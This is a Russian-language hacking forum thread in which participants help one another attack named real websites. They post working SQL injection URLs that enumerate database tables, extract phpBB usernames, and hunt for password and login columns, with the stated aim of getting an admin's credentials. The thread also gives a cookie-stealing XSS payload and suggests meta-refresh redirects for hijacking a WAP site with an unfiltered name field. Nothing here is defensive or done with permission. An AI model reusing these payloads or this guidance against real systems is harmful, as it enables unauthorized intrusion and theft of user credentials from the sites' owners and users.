Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(
Meta refresh, как я писал выше, только его надо будет быстро удалить, или поработать некоторое время в качестве прокси, который будет этот редирект вырезать с отдаваемой страницы. P.S. А если перерисовать страницу стилями то вернуть всё обратно будет просто, т.к. тебе надо будет либо почистить тот CSS который инклудится, либо поставить display: none !important; на всё то что ты добавил на страницу, и display: block !important; на всё что убрал.
Народ, нужна помощь, есть скуля с таблами, есть табла phpbb_users, но она я так понял пустая....о воще все перебрал..не работают..помогите плиз, в чём ошибка? версия 5.0.51a скуля с таблами Code: http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_name,4,5,6,7%20FROM%20INFORMATION_SCHEMA.TABLES нада логин и пасс админа
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_schema,4,5,6,7+from+information_schema.tables+where+table_name=0x70687062625F7573657273 forumvdn http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,database(),4,5,6,7 vdn Таблица в другой базе Поля http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x70687062625F7573657273 Вот вывод http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,username,4,5,6,7%20FROM%20forumvdn.phpbb_users А вот хелп на будующее: https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
open_basedir () xss http://cronos.net.ru/database.php?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
угу...спс. а не подскажите прогу для поиска sql уязвимостей на сайте? а язна, гугль рулит....но хотелось бы ваши личные советы
Там рядом скуля... Code: http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22-- Руки ^^
Всем, хай. Подскажите. Есть скуля, далее: =-77+union+select+1,2,3,4,5,6,7,8,9,10-- вываливается ошибка: You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4 Я так понимаю я не правильно строю запрос? Попробовал несколько вариантов, тоже самое. Подскажите, где косяк?
мужики, 407 таблиц...помогите найти нужную, плиз Code: http://soft.dndz.dp.ua/program.php?id=-781%20UNION%20SELECT%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15%20FROM%20INFORMATION_SCHEMA.TABLES%20limit%20392,1%20--
Вот запрос - выдергивает все таблицы, в которых есть колонка "password" Code: http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264-- С колонкой - login Code: http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x6c6f67696e--
Code: http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+order+by+23&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp Насколько я помню, в access, в запросе обязательно должна присутствовать таблица.. Вот только ни одну не подобрать...
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp это Microsoft Access статья https://forum.antichat.ru/showthread.php?t=50550 ===== R1dex И что? Это системная табла и как я вижу - доступ закрыт. я не видел что ты уже отписался
